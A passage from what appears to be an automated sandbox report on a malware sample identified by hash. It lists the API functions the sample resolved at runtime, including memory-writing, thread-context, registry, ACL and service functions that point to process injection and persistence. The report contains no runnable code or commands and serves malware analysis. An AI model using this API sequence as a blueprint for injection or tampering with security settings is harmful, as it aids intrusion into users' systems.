00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005760)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006032)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00006032)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00006032)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00006032)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006032)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 